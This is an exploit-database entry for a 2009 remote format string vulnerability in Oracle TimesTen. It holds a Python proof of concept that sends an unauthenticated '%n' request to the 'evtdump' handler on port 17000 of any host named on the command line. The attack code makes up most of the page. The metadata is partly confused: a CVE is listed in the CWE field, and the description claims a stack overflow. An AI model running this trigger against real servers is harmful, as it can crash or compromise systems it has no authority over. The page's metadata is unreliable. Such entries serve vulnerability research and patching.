header-logo
Suggest Exploit
vendor:
TimesTen
by:
Joxean Koret
8.8
CVSS
HIGH
Format String
134
CWE
Product Name: TimesTen
Affected Version From: 11.2.1.6.0
Affected Version To: 11.2.1.6.0
Patch Exists: YES
Related CWE: CVE-2009-0025
CPE: a:oracle:timesten:11.2.1.6.0
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Oracle TimesTen Remote Format String

This exploit allows a remote attacker to execute arbitrary code on vulnerable installations of Oracle TimesTen. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the 'evtdump' parameter. By supplying a specially crafted format string, an attacker can cause a stack-based buffer overflow and execute arbitrary code.

Mitigation:

Upgrade to Oracle TimesTen version 11.2.1.7.0 or later.
Source

Exploit-DB raw data:

#!/usr/bin/python

"""
Oracle TimesTen Remote Format String (Fixed in Oracle CPU Jan 2009
Copyright (c) Joxean Koret 2009
"""

import sys
import socket

def testPoc(host):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host, 17000))
	buf = "GET evtdump?msg=AAAA%25n HTTP/1.0\r\n\r\n"
	print "Sending: %s" % buf
	s.send(buf)
	print s.recv(4096)
	s.close()

if __name__ == "__main__":
	if len(sys.argv) == 1:
		print "Usage:", sys.argv[0], "<target host>"
		print
		sys.exit(1)
	else:
		testPoc(sys.argv[1])

# milw0rm.com [2009-01-14]